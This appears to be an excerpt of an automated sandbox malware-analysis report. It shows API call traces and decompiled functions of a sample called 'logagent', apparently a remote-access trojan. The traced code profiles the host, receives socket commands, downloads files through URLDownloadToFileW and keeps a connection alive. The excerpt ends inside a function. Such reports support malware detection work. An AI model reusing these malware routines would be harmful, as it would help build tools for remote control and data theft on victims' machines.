                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D2BC
                                  • SetEvent.KERNEL32(?), ref: 0040D2C5
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D2CE
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6DF55DF0), ref: 0040D2E8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040D2F9
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D308
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • GetTickCount.KERNEL32 ref: 0040D33C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,?,?,00000000), ref: 0040D39C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000,?,?,00000000), ref: 0040D3AC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000,?,?,00000000), ref: 0040D3BC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000,?,?,00000000), ref: 0040D3CC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,00000000,?,?), ref: 0040D3DC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040D3E6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004C), ref: 0040D402
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D40E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D41A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D426
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D432
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D43E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D44A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D456
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D462
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040D474
                                  • atoi.MSVCRT ref: 0040D47B
                                  • Sleep.KERNEL32(00000064), ref: 0040DD60
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 0040DD83
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040DD95
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DDB0
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040DDBB
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,00000000), ref: 0040DDDD
                                  • URLDownloadToFileW.URLMON(00000000,00000000), ref: 0040DDE5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DDF9
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040DE0D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@V01@@$?length@?$basic_string@V12@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@CountD@1@@DownloadEventFileSleepTickV01@atoi
                                  • String ID: $$PowrProf.dll$SetSuspendState
                                  • API String ID: 2465730144-1158640710
                                  • Opcode ID: 700d22180a46834cfb2d7b2e024b23e4551d9b1613aa921921a51e3d56ddad31
                                  • Instruction ID: 8b97f5ae68acd249977ecc05ae4d1582f654e66521c0ff460722a1e21975d306
                                  • Opcode Fuzzy Hash: 700d22180a46834cfb2d7b2e024b23e4551d9b1613aa921921a51e3d56ddad31
                                  • Instruction Fuzzy Hash: D8529372900208EBDB04BBB1EC59AEE7768EF54305F10487EF512A70E2DF785A54CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 100%
                                  			E00409908() {
                                  				struct HINSTANCE__* _t1;
                                  				_Unknown_base(*)()* _t2;
                                  				_Unknown_base(*)()* _t22;
                                  
                                  				_t1 = LoadLibraryA("Psapi.dll"); // executed
                                  				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
                                  				 *0x41bc94 = _t2;
                                  				if(_t2 == 0) {
                                  					 *0x41bc94 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
                                  				}
                                  				 *0x41bc90 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
                                  				if( *0x41bc94 == 0) {
                                  					 *0x41bc90 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
                                  				}
                                  				 *0x41bca0 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
                                  				 *0x41c1e4 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
                                  				 *0x41c1e8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
                                  				 *0x41bc98 = GetProcAddress(GetModuleHandleA("Shell32"), "IsUserAnAdmin");
                                  				 *0x41bcd0 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
                                  				 *0x41bca4 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
                                  				 *0x41bc78 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
                                  				 *0x41bca8 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
                                  				_t22 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
                                  				 *0x41bc9c = _t22;
                                  				return _t22;
                                  			}

                                  APIs
                                  • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,0041BA38,0041BCB0,00000000,00408F24,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040991B
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409924
                                  • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040993F
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409942
                                  • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409953
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409956
                                  • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409970
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409973
                                  • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409984
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409987
                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409998
                                  • GetProcAddress.KERNEL32(00000000), ref: 0040999B
                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099AC
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099AF
                                  • GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099C0
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099C3
                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099D4
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099D7
                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099E8
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099EB
                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099FC
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099FF
                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409A10
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409A13
                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409A21
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409A24
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$HandleModule$LibraryLoad
                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$user32
                                  • API String ID: 551388010-2914448473
                                  • Opcode ID: 94181ff0da5f878129800e6c898616cd0638ed43b76235def3f7d6061dc3ba3f
                                  • Instruction ID: 4c9355c828fc4da35060c465c8423d7dda30a1a04bb52c9e9a5aad065eac730d
                                  • Opcode Fuzzy Hash: 94181ff0da5f878129800e6c898616cd0638ed43b76235def3f7d6061dc3ba3f
                                  • Instruction Fuzzy Hash: F721AFB0E81358B9DA206BB56C4EFDB7E59DA94B54323442BB40893194EFBCC480CEDC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 37%
                                  			E00402580(void* __ecx, intOrPtr _a4, intOrPtr _a8, char _a11) {
                                  				struct _SYSTEMTIME _v20;
                                  				char _v36;
                                  				void* _v52;
                                  				char* _t25;
                                  				char* _t26;
                                  				intOrPtr _t35;
                                  				void* _t37;
                                  
                                  				_t37 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 0x38)) != 0) {
                                  					__eflags = 0;
                                  					return 0;
                                  				}
                                  				_t35 = _a4;
                                  				if(_a8 != 0) {
                                  					__eflags =  *0x41bcac; // 0x0
                                  					if(__eflags != 0) {
                                  						GetLocalTime( &_v20);
                                  						_t25 =  &_a11;
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t25, "KeepAlive Enabled! Timeout: %i seconds\n", _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff, _t35);
                                  						_t26 =  &_v36;
                                  						L00414170();
                                  						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t26, _t25);
                                  						printf(_t26);
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					}
                                  				} else {
                                  					 *((char*)(__ecx + 0x44)) = 1;
                                  				}
                                  				 *((char*)(_t37 + 0x38)) = 1;
                                  				 *((intOrPtr*)(_t37 + 0x3c)) = _t35;
                                  				CreateThread(0, 0, E004027A2, _t37, 0, 0); // executed
                                  				return 1;
                                  			}

                                  APIs
                                  • GetLocalTime.KERNEL32(?,00000001,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025B0
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,0000000A,?,00000000,?,0000000A), ref: 004025DC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025E7
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025F1
                                  • printf.MSVCRT ref: 004025F8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402604
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040260D
                                  • CreateThread.KERNELBASE(00000000,00000000,004027A2,0041BE70,00000000,00000000), ref: 00402624
                                  Strings
                                  • %02i:%02i:%02i:%03i [INFO] , xrefs: 004025D7
                                  • KeepAlive Enabled! Timeout: %i seconds, xrefs: 004025D1
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@CreateD@1@@D@2@@0@Hstd@@LocalThreadTimeV10@V?$basic_string@printf
                                  • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds
                                  • API String ID: 3715082883-586133315
                                  • Opcode ID: 51604d627dacd7a8ae8a3435ef703a50610ed316e6cde58bd2f1e49f68c81dc1
                                  • Instruction ID: a312a60622e34753c5bc094497f25c33392341c8bb354fb046c7070d615c6ac2
                                  • Opcode Fuzzy Hash: 51604d627dacd7a8ae8a3435ef703a50610ed316e6cde58bd2f1e49f68c81dc1
                                  • Instruction Fuzzy Hash: A611EB71800258FFCB119BE1DC48DFFBBBCAB95705B004426F842A3190D6B99944CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                  • malloc.MSVCRT ref: 00402175
                                  • recv.WS2_32(0041BE70,00000000,000003E8,00000000), ref: 00402186
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                    • Part of subcall function 0040221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,0041BE70,00000000), ref: 00402230
                                    • Part of subcall function 0040221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 00402248
                                    • Part of subcall function 0040221E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402257
                                    • Part of subcall function 0040221E: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402261
                                    • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040227A
                                    • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402283
                                    • Part of subcall function 0040221E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0040D2A6,0041BEA4), ref: 004022A2
                                    • Part of subcall function 0040221E: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004022C2
                                    • Part of subcall function 0040221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 004022DA
                                    • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 004022EC
                                    • Part of subcall function 0040221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6DF55DF0), ref: 00402302
                                    • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040230C
                                    • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402315
                                    • Part of subcall function 0040221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,0040D2A6), ref: 00402326
                                    • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402330
                                    • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402339
                                    • Part of subcall function 0040221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040234D
                                  • free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??1?$basic_string@V01@$??0?$basic_string@??4?$basic_string@$D@1@@$??9std@@?substr@?$basic_string@D@2@@0@V12@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?length@?$basic_string@?size@?$basic_string@Y?$basic_string@freemallocrecv
                                  • String ID:
                                  • API String ID: 2200674315-0
                                  • Opcode ID: 533559aab0e3dcf38d7224a0014533e596ea9eed5f72da431cbdb498b9f83fa6
                                  • Instruction ID: 77ffb52b31aa9a22c106954051cf48487ac881783d2d7cd2d5b7dec6e0024f6e
                                  • Opcode Fuzzy Hash: 533559aab0e3dcf38d7224a0014533e596ea9eed5f72da431cbdb498b9f83fa6
                                  • Instruction Fuzzy Hash: 0221443250050DEBCB15EBA0DE49EDEB7B9FF94745B104029E902B21D1DBB56A05CB14
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 28%
                                  			E00412163(intOrPtr _a4) {
                                  				char _v5;
                                  				char _v12;
                                  				long _v16;
                                  				char _v32;
                                  				void* _v48;
                                  				char _v80;
                                  				short _v592;
                                  				char* _t23;
                                  				char* _t25;
                                  
                                  				_v12 = 0x10;
                                  				 *0x41c1e8(1,  &_v80,  &_v12); // executed
                                  				_v16 = 0x100;
                                  				GetUserNameW( &_v592,  &_v16); // executed
                                  				_t23 =  &_v5;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z("/", _t23,  &_v592);
                                  				_t25 =  &_v32;
                                  				L0041416A();
                                  				L00414146();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_a4, _t25, _t25,  &_v80, _t23);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _a4;
                                  			}

                                  APIs
                                  • GetUserNameW.ADVAPI32(?,?), ref: 00412195
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416C08,?,?), ref: 004121AE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004121BD
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(00000010,00000000), ref: 004121C9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004121D4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004121DD
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@G@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@1@@NameUserV10@V10@@
                                  • String ID:
                                  • API String ID: 3382107156-0
                                  • Opcode ID: b8e59d28f1cfdb65fc57b1756a71ba3e9b4df3560f8848897e1e7dd21217353c
                                  • Instruction ID: b94a0025ee3120f282ce46cac819fd7ffee2fdf7fe7efc1014d8e4d368efe18d
                                  • Opcode Fuzzy Hash: b8e59d28f1cfdb65fc57b1756a71ba3e9b4df3560f8848897e1e7dd21217353c
                                  • Instruction Fuzzy Hash: E301DE72C0010DEBDB01DF94DC49EDEBB7CEB48304F108062F915E2150EB75A6898FA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 56%
                                  			E10541006(void* __eax, signed char __ebx, void* __ecx, void* __edx, void* __edi, void* __fp0) {
                                  				signed char _t132;
                                  				signed char* _t134;
                                  				void* _t137;
                                  				struct HINSTANCE__* _t139;
                                  				void* _t144;
                                  				void* _t145;
                                  				void* _t150;
                                  				intOrPtr _t152;
                                  				intOrPtr* _t154;
                                  				void* _t157;
                                  				void* _t161;
                                  				void* _t165;
                                  				intOrPtr _t169;
                                  				void* _t174;
                                  				unsigned int _t176;
                                  				void* _t178;
                                  				void* _t179;
                                  				unsigned int _t181;
                                  				signed int _t183;
                                  				signed int _t184;
